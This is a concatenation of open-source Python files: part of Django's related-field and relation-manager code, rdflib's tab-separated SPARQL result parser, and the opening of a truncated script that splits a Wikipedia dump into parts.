db = router.db_for_read(self.field.rel.to, instance=instance)
if getattr(rel_mgr, 'use_for_related_fields', False):
rel_obj = rel_mgr.using(db).get(**params)
else:
rel_obj = QuerySet(self.field.rel.to).using(db).get(**params)
setattr(instance, cache_name, rel_obj)
return rel_obj
def __set__(self, instance, value):
if instance is None:
raise AttributeError("%s must be accessed via instance" % self._field.name)
# If null=True, we can assign null here, but otherwise the value needs
# to be an instance of the related class.
if value is None and self.field.null == False:
raise ValueError('Cannot assign None: "%s.%s" does not allow null values.' %
(instance._meta.object_name, self.field.name))
elif value is not None and not isinstance(value, self.field.rel.to):
raise ValueError('Cannot assign "%r": "%s.%s" must be a "%s" instance.' %
(value, instance._meta.object_name,
self.field.name, self.field.rel.to._meta.object_name))
elif value is not None:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": instance is on database "%s", value is on database "%s"' %
(value, instance._state.db, value._state.db))
# If we're setting the value of a OneToOneField to None, we need to clear
# out the cache on any old related object. Otherwise, deleting the
# previously-related object will also cause this object to be deleted,
# which is wrong.
if value is None:
# Look up the previously-related object, which may still be available
# since we've not yet cleared out the related field.
# Use the cache directly, instead of the accessor; if we haven't
# populated the cache, then we don't care - we're only accessing
# the object to invalidate the accessor cache, so there's no
# need to populate the cache just to expire it again.
related = getattr(instance, self.field.get_cache_name(), None)
# If we've got an old related object, we need to clear out its
# cache. This cache also might not exist if the related object
# hasn't been accessed yet.
if related:
cache_name = self.field.related.get_cache_name()
try:
delattr(related, cache_name)
except AttributeError:
pass
# Set the value of the related field
try:
val = getattr(value, self.field.rel.get_related_field().attname)
except AttributeError:
val = None
setattr(instance, self.field.attname, val)
# Since we already know what the related object is, seed the related
# object cache now, too. This avoids another db hit if you get the
# object you just set.
setattr(instance, self.field.get_cache_name(), value)
class ForeignRelatedObjectsDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# multiple "remote" values and have a ForeignKey pointed at them by
# some other model. In the example "poll.choice_set", the choice_set
# attribute is a ForeignRelatedObjectsDescriptor instance.
def __init__(self, related):
self.related = related # RelatedObject instance
def __get__(self, instance, instance_type=None):
if instance is None:
return self
return self.create_manager(instance,
self.related.model._default_manager.__class__)
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Manager must be accessed via instance")
manager = self.__get__(instance)
# If the foreign key can support nulls, then completely clear the related set.
# Otherwise, just move the named objects into the set.
if self.related.field.null:
manager.clear()
manager.add(*value)
def delete_manager(self, instance):
"""
Returns a queryset based on the related model's base manager (rather
than the default manager, as returned by __get__). Used by
Model.delete().
"""
return self.create_manager(instance,
self.related.model._base_manager.__class__)
def create_manager(self, instance, superclass):
"""
Creates the managers used by other methods (__get__() and delete()).
"""
rel_field = self.related.field
rel_model = self.related.model
class RelatedManager(superclass):
def get_query_set(self):
db = self._db or router.db_for_read(rel_model, instance=instance)
return superclass.get_query_set(self).using(db).filter(**(self.core_filters))
def add(self, *objs):
for obj in objs:
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
setattr(obj, rel_field.name, instance)
obj.save()
add.alters_data = True
def create(self, **kwargs):
kwargs.update({rel_field.name: instance})
db = router.db_for_write(rel_model, instance=instance)
return super(RelatedManager, self.db_manager(db)).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
# Update kwargs with the related object that this
# ForeignRelatedObjectsDescriptor knows about.
kwargs.update({rel_field.name: instance})
db = router.db_for_write(rel_model, instance=instance)
return super(RelatedManager, self.db_manager(db)).get_or_create(**kwargs)
get_or_create.alters_data = True
# remove() and clear() are only provided if the ForeignKey can have a value of null.
if rel_field.null:
def remove(self, *objs):
val = getattr(instance, rel_field.rel.get_related_field().attname)
for obj in objs:
# Is obj actually part of this descriptor set?
if getattr(obj, rel_field.attname) == val:
setattr(obj, rel_field.name, None)
obj.save()
else:
raise rel_field.rel.to.DoesNotExist("%r is not related to %r." % (obj, instance))
remove.alters_data = True
def clear(self):
for obj in self.all():
setattr(obj, rel_field.name, None)
obj.save()
clear.alters_data = True
manager = RelatedManager()
attname = rel_field.rel.get_related_field().name
manager.core_filters = {'%s__%s' % (rel_field.name, attname):
getattr(instance, attname)}
manager.model = self.related.model
return manager
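# A minimal sketch (hypothetical models) of the manager created above;
# "poll.choice_set" is a RelatedManager whose core_filters pin every query
# to the owning instance:
#
#     poll.choice_set.all()                   # only choices FK'd to this poll
#     poll.choice_set.create(choice='Maybe')  # FK filled in automatically
#     poll.choice_set.add(orphan_choice)      # sets the FK and saves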
def create_many_related_manager(superclass, rel=False):
"""Creates a manager that subclasses 'superclass' (which is a Manager)
and adds behavior for many-to-many related objects."""
through = rel.through
class ManyRelatedManager(superclass):
def __init__(self, model=None, core_filters=None, instance=None, symmetrical=None,
join_table=None, source_field_name=None, target_field_name=None,
reverse=False):
super(ManyRelatedManager, self).__init__()
self.core_filters = core_filters
self.model = model
self.symmetrical = symmetrical
self.instance = instance
self.source_field_name = source_field_name
self.target_field_name = target_field_name
self.through = through
self._pk_val = self.instance.pk
self.reverse = reverse
if self._pk_val is None:
raise ValueError("%r instance needs to have a primary key value before a many-to-many relationship can be used." % instance.__class__.__name__)
def get_query_set(self):
db = self._db or router.db_for_read(self.instance.__class__, instance=self.instance)
return superclass.get_query_set(self).using(db)._next_is_sticky().filter(**(self.core_filters))
# If the ManyToMany relation has an intermediary model,
# the add and remove methods do not exist.
if rel.through._meta.auto_created:
def add(self, *objs):
self._add_items(self.source_field_name, self.target_field_name, *objs)
# If this is a symmetrical m2m relation to self, add the mirror entry in the m2m table
if self.symmetrical:
self._add_items(self.target_field_name, self.source_field_name, *objs)
add.alters_data = True
def remove(self, *objs):
self._remove_items(self.source_field_name, self.target_field_name, *objs)
# If this is a symmetrical m2m relation to self, remove the mirror entry in the m2m table
if self.symmetrical:
self._remove_items(self.target_field_name, self.source_field_name, *objs)
remove.alters_data = True
def clear(self):
self._clear_items(self.source_field_name)
# If this is a symmetrical m2m relation to self, clear the mirror entry in the m2m table
if self.symmetrical:
self._clear_items(self.target_field_name)
clear.alters_data = True
def create(self, **kwargs):
# This check needs to be done here, since we can't later remove this
# from the method lookup table, as we do with add and remove.
if not rel.through._meta.auto_created:
opts = through._meta
raise AttributeError("Cannot use create() on a ManyToManyField which specifies an intermediary model. Use %s.%s's Manager instead." % (opts.app_label, opts.object_name))
db = router.db_for_write(self.instance.__class__, instance=self.instance)
new_obj = super(ManyRelatedManager, self.db_manager(db)).create(**kwargs)
self.add(new_obj)
return new_obj
create.alters_data = True
def get_or_create(self, **kwargs):
db = router.db_for_write(self.instance.__class__, instance=self.instance)
obj, created = \
super(ManyRelatedManager, self.db_manager(db)).get_or_create(**kwargs)
# We only need to add() if created because if we got an object back
# from get() then the relationship already exists.
if created:
self.add(obj)
return obj, created
get_or_create.alters_data = True
def _add_items(self, source_field_name, target_field_name, *objs):
# join_table: name of the m2m link table
# source_field_name: the PK fieldname in join_table for the source object
# target_field_name: the PK fieldname in join_table for the target object
# *objs - objects to add. Either object instances, or primary keys of object instances.
# If there aren't any objects, there is nothing to do.
from django.db.models import Model
if objs:
new_ids = set()
for obj in objs:
if isinstance(obj, self.model):
if not router.allow_relation(obj, self.instance):
raise ValueError('Cannot add "%r": instance is on database "%s", value is on database "%s"' %
(obj, self.instance._state.db, obj._state.db))
new_ids.add(obj.pk)
elif isinstance(obj, Model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
else:
new_ids.add(obj)
db = router.db_for_write(self.through, instance=self.instance)
vals = self.through._default_manager.using(db).values_list(target_field_name, flat=True)
vals = vals.filter(**{
source_field_name: self._pk_val,
'%s__in' % target_field_name: new_ids,
})
new_ids = new_ids - set(vals)
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action='pre_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
# Add the ones that aren't there already
for obj_id in new_ids:
self.through._default_manager.using(db).create(**{
'%s_id' % source_field_name: self._pk_val,
'%s_id' % target_field_name: obj_id,
})
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action='post_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
def _remove_items(self, source_field_name, target_field_name, *objs):
            # source_field_name: the PK fieldname in join_table for the source object
            # target_field_name: the PK fieldname in join_table for the target object
# *objs - objects to remove
# If there aren't any objects, there is nothing to do.
if objs:
# Check that all the objects are of the right type
old_ids = set()
for obj in objs:
if isinstance(obj, self.model):
old_ids.add(obj.pk)
else:
old_ids.add(obj)
# Work out what DB we're operating on
db = router.db_for_write(self.through, instance=self.instance)
# Send a signal to the other end if need be.
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are deleting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="pre_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
# Remove the specified objects from the join table
self.through._default_manager.using(db).filter(**{
source_field_name: self._pk_val,
'%s__in' % target_field_name: old_ids
}).delete()
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are deleting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="post_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
def _clear_items(self, source_field_name):
db = router.db_for_write(self.through, instance=self.instance)
            # source_field_name: the PK fieldname in join_table for the source object
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are clearing the
# duplicate data rows for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="pre_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
self.through._default_manager.using(db).filter(**{
source_field_name: self._pk_val
}).delete()
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are clearing the
# duplicate data rows for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="post_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
return ManyRelatedManager
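# A minimal sketch (hypothetical models) of the manager built by
# create_many_related_manager(); with an auto-created through model both
# ends get add()/remove()/clear(), with a manual intermediary they do not:
#
#     article.publications.add(p1, p2)   # inserts join rows, fires m2m_changed
#     article.publications.remove(p1)    # deletes the matching join rows
#     article.publications.clear()       # empties this side of the relation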
class ManyRelatedObjectsDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# multiple "remote" values and have a ManyToManyField pointed at them by
# some other model (rather than having a ManyToManyField themselves).
# In the example "publication.article_set", the article_set attribute is a
# ManyRelatedObjectsDescriptor instance.
def __init__(self, related):
self.related = related # RelatedObject instance
def __get__(self, instance, instance_type=None):
if instance is None:
return self
# Dynamically create a class that subclasses the related
# model's default manager.
rel_model = self.related.model
superclass = rel_model._default_manager.__class__
RelatedManager = create_many_related_manager(superclass, self.related.field.rel)
manager = RelatedManager(
model=rel_model,
core_filters={'%s__pk' % self.related.field.name: instance._get_pk_val()},
instance=instance,
symmetrical=False,
source_field_name=self.related.field.m2m_reverse_field_name(),
target_field_name=self.related.field.m2m_field_name(),
reverse=True
)
return manager
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Manager must be accessed via instance")
if not self.related.field.rel.through._meta.auto_created:
opts = self.related.field.rel.through._meta
raise AttributeError("Cannot set values on a ManyToManyField which specifies an intermediary model. Use %s.%s's Manager instead." % (opts.app_label, opts.object_name))
manager = self.__get__(instance)
manager.clear()
manager.add(*value)
class ReverseManyRelatedObjectsDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# multiple "remote" values and have a ManyToManyField defined in their
# model (rather than having another model pointed *at* them).
# In the example "article.publications", the publications attribute is a
# ReverseManyRelatedObjectsDescriptor instance.
def __init__(self, m2m_field):
self.field = m2m_field
def _through(self):
# through is provided so that you have easy access to the through
# model (Book.authors.through) for inlines, etc. This is done as
# a property to ensure that the fully resolved value is returned.
return self.field.rel.through
through = property(_through)
def __get__(self, instance, instance_type=None):
if instance is None:
return self
# Dynamically create a class that subclasses the related
# model's default manager.
rel_model=self.field.rel.to
superclass = rel_model._default_manager.__class__
RelatedManager = create_many_related_manager(superclass, self.field.rel)
manager = RelatedManager(
model=rel_model,
core_filters={'%s__pk' % self.field.related_query_name(): instance._get_pk_val()},
instance=instance,
symmetrical=self.field.rel.symmetrical,
source_field_name=self.field.m2m_field_name(),
target_field_name=self.field.m2m_reverse_field_name(),
reverse=False
)
return manager
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Manager must be accessed via instance")
if not self.field.rel.through._meta.auto_created:
opts = self.field.rel.through._meta
raise AttributeError("Cannot set values on a ManyToManyField which specifies an intermediary model. Use %s.%s's Manager instead." % (opts.app_label, opts.object_name))
manager = self.__get__(instance)
manager.clear()
manager.add(*value)
class ManyToOneRel(object):
def __init__(self, to, field_name, related_name=None, limit_choices_to=None,
parent_link=False, on_delete=None):
try:
to._meta
except AttributeError: # to._meta doesn't exist, so it must be RECURSIVE_RELATIONSHIP_CONSTANT
assert isinstance(to, basestring), "'to' must be either a model, a model name or the string %r" % RECURSIVE_RELATIONSHIP_CONSTANT
self.to, self.field_name = to, field_name
self.related_name = related_name
if limit_choices_to is None:
limit_choices_to = {}
self.limit_choices_to = limit_choices_to
self.multiple = True
self.parent_link = parent_link
self.on_delete = on_delete
def is_hidden(self):
"Should the related object be hidden?"
return self.related_name and self.related_name[-1] == '+'
def get_related_field(self):
"""
Returns the Field in the 'to' object to which this relationship is
tied.
"""
data = self.to._meta.get_field_by_name(self.field_name)
if not data[2]:
raise FieldDoesNotExist("No related field named '%s'" %
self.field_name)
return data[0]
class OneToOneRel(ManyToOneRel):
def __init__(self, to, field_name, related_name=None, limit_choices_to=None,
parent_link=False, on_delete=None):
super(OneToOneRel, self).__init__(to, field_name,
related_name=related_name, limit_choices_to=limit_choices_to,
parent_link=parent_link, on_delete=on_delete
)
self.multiple = False
class ManyToManyRel(object):
def __init__(self, to, related_name=None, limit_choices_to=None,
symmetrical=True, through=None):
self.to = to
self.related_name = related_name
if limit_choices_to is None:
limit_choices_to = {}
self.limit_choices_to = limit_choices_to
self.symmetrical = symmetrical
self.multiple = True
self.through = through
def is_hidden(self):
"Should the related object be hidden?"
return self.related_name and self.related_name[-1] == '+'
def get_related_field(self):
"""
        Returns the field in the 'to' object to which this relationship is tied
(this is always the primary key on the target model). Provided for
symmetry with ManyToOneRel.
"""
return self.to._meta.pk
class ForeignKey(RelatedField, Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _('Model %(model)s with pk %(pk)r does not exist.')
}
description = _("Foreign Key (type determined by related field)")
def __init__(self, to, to_field=None, rel_class=ManyToOneRel, **kwargs):
try:
to_name = to._meta.object_name.lower()
except AttributeError: # to._meta doesn't exist, so it must be RECURSIVE_RELATIONSHIP_CONSTANT
assert isinstance(to, basestring), "%s(%r) is invalid. First parameter to ForeignKey must be either a model, a model name, or the string %r" % (self.__class__.__name__, to, RECURSIVE_RELATIONSHIP_CONSTANT)
else:
assert not to._meta.abstract, "%s cannot define a relation with abstract class %s" % (self.__class__.__name__, to._meta.object_name)
# For backwards compatibility purposes, we need to *try* and set
# the to_field during FK construction. It won't be guaranteed to
# be correct until contribute_to_class is called. Refs #12190.
to_field = to_field or (to._meta.pk and to._meta.pk.name)
kwargs['verbose_name'] = kwargs.get('verbose_name', None)
if 'db_index' not in kwargs:
kwargs['db_index'] = True
kwargs['rel'] = rel_class(to, to_field,
related_name=kwargs.pop('related_name', None),
limit_choices_to=kwargs.pop('limit_choices_to', None),
parent_link=kwargs.pop('parent_link', False),
on_delete=kwargs.pop('on_delete', CASCADE),
)
Field.__init__(self, **kwargs)
def validate(self, value, model_instance):
if self.rel.parent_link:
return
super(ForeignKey, self).validate(value, model_instance)
if value is None:
return
using = router.db_for_read(model_instance.__class__, instance=model_instance)
qs = self.rel.to._default_manager.using(using).filter(
**{self.rel.field_name: value}
)
qs = qs.complex_filter(self.rel.limit_choices_to)
if not qs.exists():
raise exceptions.ValidationError(self.error_messages['invalid'] % {
'model': self.rel.to._meta.verbose_name, 'pk': value})
def get_attname(self):
return '%s_id' % self.name
def get_validator_unique_lookup_type(self):
return '%s__%s__exact' % (self.name, self.rel.get_related_field().name)
def get_default(self):
"Here we check if the default value is an object and return the to_field if so."
field_default = super(ForeignKey, self).get_default()
if isinstance(field_default, self.rel.to):
return getattr(field_default, self.rel.get_related_field().attname)
return field_default
def get_db_prep_save(self, value, connection):
if value == '' or value == None:
return None
else:
return self.rel.get_related_field().get_db_prep_save(value,
connection=connections[router.db_for_read(self.rel.to)])
def value_to_string(self, obj):
if not obj:
# In required many-to-one fields with only one available choice,
# select that one available choice. Note: For SelectFields
# we have to check that the length of choices is *2*, not 1,
# because SelectFields always have an initial "blank" value.
if not self.blank and self.choices:
choice_list = self.get_choices_default()
if len(choice_list) == 2:
return smart_unicode(choice_list[1][0])
return Field.value_to_string(self, obj)
def contribute_to_class(self, cls, name):
super(ForeignKey, self).contribute_to_class(cls, name)
setattr(cls, self.name, ReverseSingleRelatedObjectDescriptor(self))
if isinstance(self.rel.to, basestring):
target = self.rel.to
else:
target = self.rel.to._meta.db_table
cls._meta.duplicate_targets[self.column] = (target, "o2m")
def contribute_to_related_class(self, cls, related):
# Internal FK's - i.e., those with a related name ending with '+' -
# don't get a related descriptor.
if not self.rel.is_hidden():
setattr(cls, related.get_accessor_name(), ForeignRelatedObjectsDescriptor(related))
if self.rel.limit_choices_to:
cls._meta.related_fkey_lookups.append(self.rel.limit_choices_to)
if self.rel.field_name is None:
self.rel.field_name = cls._meta.pk.name
def formfield(self, **kwargs):
db = kwargs.pop('using', None)
defaults = {
'form_class': forms.ModelChoiceField,
'queryset': self.rel.to._default_manager.using(db).complex_filter(self.rel.limit_choices_to),
'to_field_name': self.rel.field_name,
}
defaults.update(kwargs)
return super(ForeignKey, self).formfield(**defaults)
def db_type(self, connection):
# The database column type of a ForeignKey is the column type
# of the field to which it points. An exception is if the ForeignKey
# points to an AutoField/PositiveIntegerField/PositiveSmallIntegerField,
# in which case the column type is simply that of an IntegerField.
        # If the database needs similar types for key fields, however, the only
        # thing we can do is make AutoField an IntegerField.
rel_field = self.rel.get_related_field()
return rel_field.related_db_type(connection=connections[router.db_for_read(rel_field.model)])
class OneToOneField(ForeignKey):
"""
A OneToOneField is essentially the same as a ForeignKey, with the exception
that always carries a "unique" constraint with it and the reverse relation
always returns the object pointed to (since there will only ever be one),
rather than returning a list.
"""
description = _("One-to-one relationship")
def __init__(self, to, to_field=None, **kwargs):
kwargs['unique'] = True
super(OneToOneField, self).__init__(to, to_field, OneToOneRel, **kwargs)
def contribute_to_related_class(self, cls, related):
setattr(cls, related.get_accessor_name(),
SingleRelatedObjectDescriptor(related))
def formfield(self, **kwargs):
if self.rel.parent_link:
return None
return super(OneToOneField, self).formfield(**kwargs)
def save_form_data(self, instance, data):
if isinstance(data, self.rel.to):
setattr(instance, self.name, data)
else:
setattr(instance, self.attname, data)
def create_many_to_many_intermediary_model(field, klass):
from django.db import models
managed = True
if isinstance(field.rel.to, basestring) and field.rel.to != RECURSIVE_RELATIONSHIP_CONSTANT:
to_model = field.rel.to
to = to_model.split('.')[-1]
def set_managed(field, model, cls):
field.rel.through._meta.managed = model._meta.managed or cls._meta.managed
add_lazy_relation(klass, field, to_model, set_managed)
elif isinstance(field.rel.to, basestring):
to = klass._meta.object_name
to_model = klass
managed = klass._meta.managed
else:
to = field.rel.to._meta.object_name
to_model = field.rel.to
managed = klass._meta.managed or to_model._meta.managed
name = '%s_%s' % (klass._meta.object_name, field.name)
if field.rel.to == RECURSIVE_RELATIONSHIP_CONSTANT or to == klass._meta.object_name:
from_ = 'from_%s' % to.lower()
to = 'to_%s' % to.lower()
else:
from_ = klass._meta.object_name.lower()
to = to.lower()
meta = type('Meta', (object,), {
'db_table': field._get_m2m_db_table(klass._meta),
'managed': managed,
'auto_created': klass,
'app_label': klass._meta.app_label,
'unique_together': (from_, to),
'verbose_name': '%(from)s-%(to)s relationship' % {'from': from_, 'to': to},
'verbose_name_plural': '%(from)s-%(to)s relationships' % {'from': from_, 'to': to},
})
# Construct and return the new class.
return type(name, (models.Model,), {
'Meta': meta,
'__module__': klass.__module__,
from_: models.ForeignKey(klass, related_name='%s+' % name),
to: models.ForeignKey(to_model, related_name='%s+' % name)
})
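# A minimal sketch of what the factory above produces for a hypothetical
# "publications = ManyToManyField(Publication)" on an Article model --
# roughly equivalent to declaring:
#
#     class Article_publications(models.Model):
#         article = models.ForeignKey(Article,
#                                     related_name='Article_publications+')
#         publication = models.ForeignKey(Publication,
#                                         related_name='Article_publications+')
#         class Meta:
#             db_table = 'myapp_article_publications'
#             auto_created = Article
#             unique_together = ('article', 'publication')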
class ManyToManyField(RelatedField, Field):
description = _("Many-to-many relationship")
def __init__(self, to, **kwargs):
try:
assert not to._meta.abstract, "%s cannot define a relation with abstract class %s" % (self.__class__.__name__, to._meta.object_name)
except AttributeError: # to._meta doesn't exist, so it must be RECURSIVE_RELATIONSHIP_CONSTANT
assert isinstance(to, basestring), "%s(%r) is invalid. First parameter to ManyToManyField must be either a model, a model name, or the string %r" % (self.__class__.__name__, to, RECURSIVE_RELATIONSHIP_CONSTANT)
kwargs['verbose_name'] = kwargs.get('verbose_name', None)
kwargs['rel'] = ManyToManyRel(to,
related_name=kwargs.pop('related_name', None),
limit_choices_to=kwargs.pop('limit_choices_to', None),
symmetrical=kwargs.pop('symmetrical', to==RECURSIVE_RELATIONSHIP_CONSTANT),
through=kwargs.pop('through', None))
self.db_table = kwargs.pop('db_table', None)
if kwargs['rel'].through is not None:
assert self.db_table is None, "Cannot specify a db_table if an intermediary model is used."
Field.__init__(self, **kwargs)
msg = _('Hold down "Control", or "Command" on a Mac, to select more than one.')
self.help_text = string_concat(self.help_text, ' ', msg)
def get_choices_default(self):
return Field.get_choices(self, include_blank=False)
def _get_m2m_db_table(self, opts):
"Function that can be curried to provide the m2m table name for this relation"
if self.rel.through is not None:
return self.rel.through._meta.db_table
elif self.db_table:
return self.db_table
else:
return util.truncate_name('%s_%s' % (opts.db_table, self.name),
connection.ops.max_name_length())
def _get_m2m_attr(self, related, attr):
"Function that can be curried to provide the source accessor or DB column name for the m2m table"
cache_attr = '_m2m_%s_cache' % attr
if hasattr(self, cache_attr):
return getattr(self, cache_attr)
for f in self.rel.through._meta.fields:
if hasattr(f,'rel') and f.rel and f.rel.to == related.model:
setattr(self, cache_attr, getattr(f, attr))
return getattr(self, cache_attr)
def _get_m2m_reverse_attr(self, related, attr):
"Function that can be curried to provide the related accessor or DB column name for the m2m table"
cache_attr = '_m2m_reverse_%s_cache' % attr
if hasattr(self, cache_attr):
return getattr(self, cache_attr)
found = False
for f in self.rel.through._meta.fields:
if hasattr(f,'rel') and f.rel and f.rel.to == related.parent_model:
if related.model == related.parent_model:
# If this is an m2m-intermediate to self,
# the first foreign key you find will be
# the source column. Keep searching for
# the second foreign key.
if found:
setattr(self, cache_attr, getattr(f, attr))
break
else:
found = True
else:
setattr(self, cache_attr, getattr(f, attr))
break
return getattr(self, cache_attr)
def value_to_string(self, obj):
data = ''
if obj:
qs = getattr(obj, self.name).all()
data = [instance._get_pk_val() for instance in qs]
else:
# In required many-to-many fields with only one available choice,
# select that one available choice.
if not self.blank:
choices_list = self.get_choices_default()
if len(choices_list) == 1:
data = [choices_list[0][0]]
return smart_unicode(data)
def contribute_to_class(self, cls, name):
# To support multiple relations to self, it's useful to have a non-None
# related name on symmetrical relations for internal reasons. The
# concept doesn't make a lot of sense externally ("you want me to
# specify *what* on my non-reversible relation?!"), so we set it up
# automatically. The funky name reduces the chance of an accidental
# clash.
if self.rel.symmetrical and (self.rel.to == "self" or self.rel.to == cls._meta.object_name):
self.rel.related_name = "%s_rel_+" % name
super(ManyToManyField, self).contribute_to_class(cls, name)
# The intermediate m2m model is not auto created if:
# 1) There is a manually specified intermediate, or
# 2) The class owning the m2m field is abstract.
if not self.rel.through and not cls._meta.abstract:
self.rel.through = create_many_to_many_intermediary_model(self, cls)
# Add the descriptor for the m2m relation
setattr(cls, self.name, ReverseManyRelatedObjectsDescriptor(self))
# Set up the accessor for the m2m table name for the relation
self.m2m_db_table = curry(self._get_m2m_db_table, cls._meta)
# Populate some necessary rel arguments so that cross-app relations
# work correctly.
if isinstance(self.rel.through, basestring):
def resolve_through_model(field, model, cls):
field.rel.through = model
add_lazy_relation(cls, self, self.rel.through, resolve_through_model)
if isinstance(self.rel.to, basestring):
target = self.rel.to
else:
target = self.rel.to._meta.db_table
cls._meta.duplicate_targets[self.column] = (target, "m2m")
def contribute_to_related_class(self, cls, related):
# Internal M2Ms (i.e., those with a related name ending with '+')
# don't get a related descriptor.
if not self.rel.is_hidden():
setattr(cls, related.get_accessor_name(), ManyRelatedObjectsDescriptor(related))
# Set up the accessors for the column names on the m2m table
self.m2m_column_name = curry(self._get_m2m_attr, related, 'column')
self.m2m_reverse_name = curry(self._get_m2m_reverse_attr, related, 'column')
self.m2m_field_name = curry(self._get_m2m_attr, related, 'name')
self.m2m_reverse_field_name = curry(self._get_m2m_reverse_attr, related, 'name')
get_m2m_rel = curry(self._get_m2m_attr, related, 'rel')
self.m2m_target_field_name = lambda: get_m2m_rel().field_name
get_m2m_reverse_rel = curry(self._get_m2m_reverse_attr, related, 'rel')
self.m2m_reverse_target_field_name = lambda: get_m2m_reverse_rel().field_name
def set_attributes_from_rel(self):
pass
def value_from_object(self, obj):
"Returns the value of this field in the given model instance."
return getattr(obj, self.attname).all()
def save_form_data(self, instance, data):
setattr(instance, self.attname, data)
def formfield(self, **kwargs):
db = kwargs.pop('using', None)
defaults = {
'form_class': forms.ModelMultipleChoiceField,
'queryset': self.rel.to._default_manager.using(db).complex_filter(self.rel.limit_choices_to)
}
defaults.update(kwargs)
# If initial is passed in, it's a list of related objects, but the
# MultipleChoiceField takes a list of IDs.
if defaults.get('initial') is not None:
initial = defaults['initial']
if callable(initial):
initial = initial()
defaults['initial'] = [i._get_pk_val() for i in initial]
return super(ManyToManyField, self).formfield(**defaults)
def db_type(self, connection):
# A ManyToManyField is not represented by a single column,
# so return None.
return None
|
lrowe/rdflib | refs/heads/master | rdflib/plugins/sparql/results/tsvresults.py | 16 |
"""
This implements the Tab Separated SPARQL Result Format
It is implemented with pyparsing, reusing the elements from the SPARQL Parser
"""
import codecs
from pyparsing import (
Optional, ZeroOrMore, Literal, ParserElement, ParseException, Suppress,
FollowedBy, LineEnd)
from rdflib.query import Result, ResultParser
from rdflib.plugins.sparql.parser import (
Var, STRING_LITERAL1, STRING_LITERAL2, IRIREF, BLANK_NODE_LABEL,
NumericLiteral, BooleanLiteral, LANGTAG)
from rdflib.plugins.sparql.parserutils import Comp, Param, CompValue
from rdflib import Literal as RDFLiteral
from rdflib.py3compat import bytestype
ParserElement.setDefaultWhitespaceChars(" \n")
String = STRING_LITERAL1 | STRING_LITERAL2
RDFLITERAL = Comp('literal', Param('string', String) + Optional(
Param('lang', LANGTAG.leaveWhitespace()
) | Literal('^^').leaveWhitespace(
) + Param('datatype', IRIREF).leaveWhitespace()))
NONE_VALUE = object()
EMPTY = FollowedBy(LineEnd()) | FollowedBy("\t")
EMPTY.setParseAction(lambda x: NONE_VALUE)
TERM = RDFLITERAL | IRIREF | BLANK_NODE_LABEL | NumericLiteral | BooleanLiteral
ROW = (EMPTY | TERM) + ZeroOrMore(Suppress("\t") + (EMPTY | TERM))
ROW.parseWithTabs()
HEADER = Var + ZeroOrMore(Suppress("\t") + Var)
HEADER.parseWithTabs()
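# A minimal illustration (hypothetical data) of the input these grammars
# accept -- one tab-separated header of variables, then one term per column:
#
#     ?name<TAB>?age
#     "Alice"@en<TAB>42
#     <http://example.org/bob><TAB>
#
# An empty column (the trailing tab above) parses as NONE_VALUE, i.e. an
# unbound variable in that row.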
class TSVResultParser(ResultParser):
def parse(self, source):
if isinstance(source.read(0), bytestype):
# if reading from source returns bytes do utf-8 decoding
source = codecs.getreader('utf-8')(source)
try:
r = Result('SELECT')
header = source.readline()
r.vars = list(HEADER.parseString(header.strip(), parseAll=True))
r.bindings = []
while True:
line = source.readline()
if not line:
break
line = line.strip('\n')
if line == "":
continue
row = ROW.parseString(line, parseAll=True)
r.bindings.append(
dict(zip(r.vars, (self.convertTerm(x) for x in row))))
return r
except ParseException, err:
print err.line
print " " * (err.column - 1) + "^"
print err
def convertTerm(self, t):
if t is NONE_VALUE:
return None
if isinstance(t, CompValue):
if t.name == 'literal':
return RDFLiteral(t.string, lang=t.lang, datatype=t.datatype)
else:
raise Exception("I dont know how to handle this: %s" % (t,))
else:
return t
if __name__ == '__main__':
import sys
r = Result.parse(file(sys.argv[1]), format='tsv')
print r.vars
print r.bindings
# print r.serialize(format='json')
|
mmuggli/doppelganger | refs/heads/master | utils/split_wikipedia.py | 6 | #! /usr/bin/env python
# -*- coding: iso-8859-15 -*-
import getopt, sys
def main():
if len(sys.argv) < 4:
return
sequences = 0
in_sequence = False
part_size = 1048576 * int(sys.argv[2])
current_file = 1
print "Part size:", part_size
print
if sys.argv[1] == "-":
infile = sys.stdin
else:
infile = open(sys.argv[1], "r")
partname = "part"
start_tag = "<" + sys.argv[3] + ">"
end_tag = "</" + sys.argv[3] + ">"
output = open(partname + "." + str(current_file), "wb")
print "Writing part", output.name, "..."
for line in infile:
